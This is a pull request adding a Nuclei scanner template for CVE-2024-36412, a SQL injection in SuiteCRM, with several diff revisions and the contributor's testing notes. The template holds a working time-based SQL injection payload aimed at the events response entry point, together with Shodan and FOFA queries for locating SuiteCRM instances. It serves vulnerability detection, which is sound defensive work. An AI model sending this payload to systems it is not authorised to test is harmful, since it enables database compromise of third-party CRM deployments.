### PR TITLE
add cve-2024-36412 

### DIFF
--- a/http/cves/2024/CVE-2024-36412.yaml
+++ b/http/cves/2024/CVE-2024-36412.yaml
@@ -1,32 +1,42 @@
 id: CVE-2024-36412
 
 info:
-  name: SuiteCRM SQL Injection
+  name: SuiteCRM - SQL Injection
   author: securityforeveryone.com
   severity: critical
   description: |
     SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
-  remediation: 7.14.4 and 8.6.1
+  remediation: |
+    7.14.4 and 8.6.1
   reference:
     - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
-    - https://www.tenable.com/cve/CVE-2024-36412
-  tags: SuiteCRM,cve,cve2024
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36412
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-36412
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    vendor: salesagility
+    product: suitecrm
+    shodan-query: title:"SuiteCRM"
+    fofa-query: title="SuiteCRM"
+  tags: cve,cve2024,suitecrm,sqli
 
 http:
-  - method: GET
-    path:
-      - '{{BaseURL}}/index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(4);--+-&type=c&response=accept'
+  - raw:
+      - |
+        @timeout: 15s
+        GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - "You have already responded to the invitation or there was a problem with the link. Please contact the sender of the invite for help"
-          - "Thank you for accepting"
-        condition: or
-
       - type: dsl
         dsl:
-          - 'duration>=4'
+          - 'duration>=6'
           - 'status_code == 200'
+          - 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")'
         condition: and

--- a/http/cves/2024/CVE-2024-36412.yaml
+++ b/http/cves/2024/CVE-2024-36412.yaml
@@ -2,7 +2,7 @@ id: CVE-2024-36412
 
 info:
   name: SuiteCRM - SQL Injection
-  author: securityforeveryone.com
+  author: securityforeveryone
   severity: critical
   description: |
     SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.

--- a/http/cves/2024/CVE-2024-36412.yaml
+++ b/http/cves/2024/CVE-2024-36412.yaml
@@ -1,0 +1,32 @@
+id: CVE-2024-36412
+
+info:
+  name: SuiteCRM SQL Injection
+  author: securityforeveryone.com
+  severity: critical
+  description: |
+    SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
+  remediation: 7.14.4 and 8.6.1
+  reference:
+    - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
+    - https://www.tenable.com/cve/CVE-2024-36412
+  tags: SuiteCRM,cve,cve2024
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(4);--+-&type=c&response=accept'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "You have already responded to the invitation or there was a problem with the link. Please contact the sender of the invite for help"
+          - "Thank you for accepting"
+        condition: or
+
+      - type: dsl
+        dsl:
+          - 'duration>=4'
+          - 'status_code == 200'
+        condition: and


### PR DESCRIPTION
CVE-2024-36412 

I have installed and tested xampp in old and new versions. I also share Burpsuite screenshots. SuiteCRM can give an error when you specify more than 4 seconds in Nuclei, so I chose 4 seconds. Do not care about the words that come returned. On sites hosting vulnerable versions, ‘thank you for accepting’ can also be returned, so I used OR.

poc:https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
ref:https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-xjx2-38hv-5hh8

vuln version
<img width="641" alt="vuln" src="https://github.com/projectdiscovery/nuclei-templates/assets/90972683/0ad47463-07cc-42f8-93b3-bf9ebbebb2ff">


non-vulnerable version
<img width="647" alt="least version" src="https://github.com/projectdiscovery/nuclei-templates/assets/90972683/3c31a071-f52e-46a1-9d05-9f02f4a41f9b">



I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)